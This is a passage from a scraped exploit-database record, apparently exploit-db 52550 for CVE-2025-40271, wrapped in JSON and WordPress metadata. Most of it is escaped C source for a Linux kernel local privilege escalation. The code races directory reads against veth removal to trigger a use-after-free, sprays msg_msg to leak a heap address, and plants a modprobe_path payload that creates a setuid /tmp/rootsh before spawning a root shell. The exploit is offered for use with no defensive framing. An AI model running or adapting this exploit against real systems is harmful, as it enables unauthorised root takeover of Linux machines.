}\\r\\n\\r\\n pos += d-\\u003ed_reclen;\\r\\n }\\r\\n }\\r\\n return NULL;\\r\\n}\\r\\n\\r\\n\/* \u2500\u2500\u2500 Modprobe payload \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 *\/\\r\\n\\r\\nstatic int setup_modprobe_payload(void)\\r\\n{\\r\\n FILE *f = fopen(\\”\/tmp\/pwn\\”, \\”w\\”);\\r\\n if (!f) return -1;\\r\\n fprintf(f, \\”#!\/bin\/sh\\\\n\/bin\/cp \/bin\/sh \/tmp\/rootsh\\\\n\/bin\/chmod u+s \/tmp\/rootsh\\\\n\\”);\\r\\n fclose(f);\\r\\n chmod(\\”\/tmp\/pwn\\”, 0755);\\r\\n\\r\\n f = fopen(\\”\/tmp\/trigger\\”, \\”w\\”);\\r\\n if (!f) return -1;\\r\\n fprintf(f, \\”\\\\xff\\\\xff\\\\xff\\\\xff\\”);\\r\\n fclose(f);\\r\\n chmod(\\”\/tmp\/trigger\\”, 0755);\\r\\n return 0;\\r\\n}\\r\\n\\r\\nstatic int trigger_modprobe(void)\\r\\n{\\r\\n pid_t p = fork();\\r\\n if (p \\u003c 0) return -1;\\r\\n if (p == 0) { execl(\\”\/tmp\/trigger\\”, \\”\/tmp\/trigger\\”, NULL); _exit(127); }\\r\\n int st;\\r\\n waitpid(p, \\u0026st, 0);\\r\\n\\r\\n struct stat sb;\\r\\n if (stat(\\”\/tmp\/rootsh\\”, \\u0026sb) == 0 \\u0026\\u0026 (sb.st_mode \\u0026 S_ISUID))\\r\\n return 0;\\r\\n return -1;\\r\\n}\\r\\n\\r\\n\/* \u2500\u2500\u2500 Main exploitation steps \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 *\/\\r\\n\\r\\nstatic int step_setup(struct race_ctx *ctx)\\r\\n{\\r\\n info(\\”Step 1: Setting up user\/net namespace…\\”);\\r\\n\\r\\n if (setup_namespace() \\u003c 0) return -1;\\r\\n ok(\\”Namespace ready, CAP_NET_ADMIN obtained\\”);\\r\\n\\r\\n ctx-\\u003ertnl_fd = rtnl_open();\\r\\n if (ctx-\\u003ertnl_fd \\u003c 0) {\\r\\n fail(\\”Cannot open rtnetlink: %s\\”, strerror(errno));\\r\\n return -1;\\r\\n }\\r\\n\\r\\n if (spray_init(\\u0026ctx-\\u003espray) \\u003c 0) {\\r\\n fail(\\”Cannot create message queue: %s\\”, strerror(errno));\\r\\n return -1;\\r\\n }\\r\\n\\r\\n return 0;\\r\\n}\\r\\n\\r\\nstatic int step_create_veths(struct race_ctx *ctx)\\r\\n{\\r\\n info(\\”Step 2: Creating veth pairs for proc entries…\\”);\\r\\n\\r\\n int created = 0;\\r\\n for (int i = 0; i \\u003c NUM_VETH_PAIRS; i++) {\\r\\n if (create_veth(ctx-\\u003ertnl_fd, i) == 0)\\r\\n created++;\\r\\n }\\r\\n\\r\\n if (created \\u003c 4) {\\r\\n fail(\\”Need at least 4 veth pairs, got %d\\”, created);\\r\\n return -1;\\r\\n }\\r\\n\\r\\n \/* Open the proc directory for readdir *\/\\r\\n ctx-\\u003edir_fd = open(PROC_NET_DIR, O_RDONLY | O_DIRECTORY);\\r\\n if (ctx-\\u003edir_fd \\u003c 0) {\\r\\n fail(\\”Cannot open %s: %s\\”, PROC_NET_DIR, strerror(errno));\\r\\n return -1;\\r\\n }\\r\\n\\r\\n ok(\\”Created %d veth pairs (%s populated)\\”, created, PROC_NET_DIR);\\r\\n return 0;\\r\\n}\\r\\n\\r\\nstatic int step_race(struct race_ctx *ctx)\\r\\n{\\r\\n info(\\”Step 3: Racing getdents vs device removal…\\”);\\r\\n\\r\\n for (int attempt = 1; attempt \\u003c= MAX_RACE_ATTEMPTS; attempt++) {\\r\\n info(\\”Attempt %d\/%d…\\”, attempt, MAX_RACE_ATTEMPTS);\\r\\n ctx-\\u003eattempts = attempt;\\r\\n\\r\\n \/* Recreate veth pairs for this attempt *\/\\r\\n for (int i = 0; i \\u003c NUM_VETH_PAIRS; i++)\\r\\n create_veth(ctx-\\u003ertnl_fd, i);\\r\\n\\r\\n \/* Reopen directory *\/\\r\\n if (ctx-\\u003edir_fd \\u003e= 0) close(ctx-\\u003edir_fd);\\r\\n ctx-\\u003edir_fd = open(PROC_NET_DIR, O_RDONLY | O_DIRECTORY);\\r\\n if (ctx-\\u003edir_fd \\u003c 0) continue;\\r\\n\\r\\n ctx-\\u003estop = 0;\\r\\n ctx-\\u003eleaked_addr = 0;\\r\\n\\r\\n \/* Start readdir racer thread *\/\\r\\n pthread_t tid;\\r\\n if (pthread_create(\\u0026tid, NULL, readdir_thread, ctx) != 0)\\r\\n continue;\\r\\n\\r\\n \/* Give readdir a moment to start *\/\\r\\n usleep(1000);\\r\\n\\r\\n \/*\\r\\n * RACE: rapidly delete veth interfaces.\\r\\n * Each deletion triggers remove_proc_entry() \u2192 rb_erase()\\r\\n * without RB_CLEAR_NODE() \u2192 stale rb links.\\r\\n * The readdir thread can follow stale links to freed memory.\\r\\n *\/\\r\\n for (int i = NUM_VETH_PAIRS – 1; i \\u003e= 0; i–) {\\r\\n delete_veth(ctx-\\u003ertnl_fd, i);\\r\\n\\r\\n \/* Immediately spray to reclaim freed proc_dir_entry slot *\/\\r\\n spray_alloc(\\u0026ctx-\\u003espray, 4);\\r\\n }\\r\\n\\r\\n \/* Wait for readdir thread to finish or detect UAF *\/\\r\\n usleep(50000);\\r\\n ctx-\\u003estop = 1;\\r\\n pthread_join(tid, NULL);\\r\\n\\r\\n \/* Clean up spray for next attempt *\/\\r\\n spray_cleanup(\\u0026ctx-\\u003espray);\\r\\n spray_init(\\u0026ctx-\\u003espray);\\r\\n\\r\\n if (ctx-\\u003eleaked_addr != 0) {\\r\\n ok(\\”UAF triggered on attempt %d!\\”, attempt);\\r\\n return 0;\\r\\n }\\r\\n }\\r\\n\\r\\n fail(\\”Could not trigger UAF after %d attempts\\”, MAX_RACE_ATTEMPTS);\\r\\n return -1;\\r\\n}\\r\\n\\r\\nstatic int step_escalate(struct race_ctx *ctx)\\r\\n{\\r\\n info(\\”Step 4: Analyzing leak and escalating…\\”);\\r\\n\\r\\n if (ctx-\\u003eleaked_addr != 0) {\\r\\n ok(\\”Kernel heap leak: 0x%016lx\\”, (unsigned long)ctx-\\u003eleaked_addr);\\r\\n info(\\”This address is from msg_msg m_list.next\/prev\\”);\\r\\n info(\\”It reveals the kernel heap (physmap) randomization\\”);\\r\\n\\r\\n \/*\\r\\n * With the heap address, we can compute modprobe_path for\\r\\n * a specific kernel version. The offset between heap base\\r\\n * and kernel text base is kernel-build-specific.\\r\\n *\\r\\n * For a complete exploit:\\r\\n * 1. Use heap address to determine KASLR slide\\r\\n * 2. Compute modprobe_path = kernel_base + offset\\r\\n * 3. Trigger another UAF + spray to write \\”\/tmp\/pwn\\” there\\r\\n * 4. Trigger modprobe \u2192 root\\r\\n *\/\\r\\n if (setup_modprobe_payload() \\u003c 0) {\\r\\n fail(\\”Cannot set up payload\\”);\\r\\n return -1;\\r\\n }\\r\\n\\r\\n info(\\”Attempting modprobe trigger…\\”);\\r\\n if (trigger_modprobe() == 0) {\\r\\n ok(\\”Got root!\\”);\\r\\n return 0;\\r\\n }\\r\\n\\r\\n info(\\”modprobe_path overwrite requires kernel-specific offset\\”);\\r\\n info(\\”Heap leak CONFIRMED \u2014 full chain needs target offsets\\”);\\r\\n return 1; \/* partial success *\/\\r\\n }\\r\\n\\r\\n return -1;\\r\\n}\\r\\n\\r\\nstatic int step_cleanup(struct race_ctx *ctx)\\r\\n{\\r\\n info(\\”Step 5: Cleaning up…\\”);\\r\\n spray_cleanup(\\u0026ctx-\\u003espray);\\r\\n if (ctx-\\u003edir_fd \\u003e= 0) close(ctx-\\u003edir_fd);\\r\\n if (ctx-\\u003ertnl_fd \\u003e= 0) close(ctx-\\u003ertnl_fd);\\r\\n unlink(\\”\/tmp\/pwn\\”);\\r\\n unlink(\\”\/tmp\/trigger\\”);\\r\\n ok(\\”Cleanup complete\\”);\\r\\n return 0;\\r\\n}\\r\\n\\r\\n\/* \u2500\u2500\u2500 Main \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500 *\/\\r\\n\\r\\nint main(void)\\r\\n{\\r\\n puts(BANNER);\\r\\n\\r\\n if (!is_vulnerable()) {\\r\\n info(\\”Kernel is patched. Nothing to do.\\”);\\r\\n return 0;\\r\\n }\\r\\n if (getuid() == 0) {\\r\\n info(\\”Already root.\\”);\\r\\n return 0;\\r\\n }\\r\\n\\r\\n struct race_ctx ctx;\\r\\n memset(\\u0026ctx, 0, sizeof(ctx));\\r\\n ctx.rtnl_fd = -1;\\r\\n ctx.dir_fd = -1;\\r\\n ctx.spray.qid = -1;\\r\\n\\r\\n int ret;\\r\\n\\r\\n ret = step_setup(\\u0026ctx);\\r\\n if (ret \\u003c 0) { fail(\\”Setup failed\\”); return 1; }\\r\\n\\r\\n ret = step_create_veths(\\u0026ctx);\\r\\n if (ret \\u003c 0) { fail(\\”Veth creation failed\\”); step_cleanup(\\u0026ctx); return 1; }\\r\\n\\r\\n ret = step_race(\\u0026ctx);\\r\\n if (ret \\u003c 0) { fail(\\”Race failed\\”); step_cleanup(\\u0026ctx); return 1; }\\r\\n\\r\\n ret = step_escalate(\\u0026ctx);\\r\\n step_cleanup(\\u0026ctx);\\r\\n\\r\\n if (ret == 0) {\\r\\n ok(\\”Spawning root shell…\\”);\\r\\n char *argv[] = { \\”\/tmp\/rootsh\\”, \\”-p\\”, NULL };\\r\\n execv(\\”\/tmp\/rootsh\\”, argv);\\r\\n info(\\”execv failed \u2014 check \/tmp\/rootsh\\”);\\r\\n } else if (ret == 1) {\\r\\n fprintf(stderr, \\”\\\\n\\”);\\r\\n info(\\”\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\\”);\\r\\n info(\\”PARTIAL SUCCESS: UAF + heap leak DEMONSTRATED\\”);\\r\\n info(\\” Leaked: 0x%016lx\\”, (unsigned long)ctx.leaked_addr);\\r\\n info(\\” Full LPE requires target-specific KASLR offset\\”);\\r\\n info(\\”\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\\”);\\r\\n }\\r\\n\\r\\n return (ret \\u003c= 1) ? 0 : 1;\\r\\n}”,”sourceHref”:”https:\/\/www.exploit-db.com\/raw\/52550″,”cvss”:{“score”:7.8,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:L\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.exploit-db.com\/exploits\/52550″,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-05-04T17:27:58″,”description”:”Exploit Title: Linux Kernel procreaddirde 6.18-rc5 – Local Privilege Escalation CVE: CVE-2025-40271 Date: 2026-03-19 Exploit Author: Aviral Srivastava Vendor: Linux Kernel kernel.org Affected: 3.14+ through…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,28,12,40,15,13,7,11,5],"class_list":["post-51288","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-78","tag-exploit","tag-exploitdb","tag-high","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n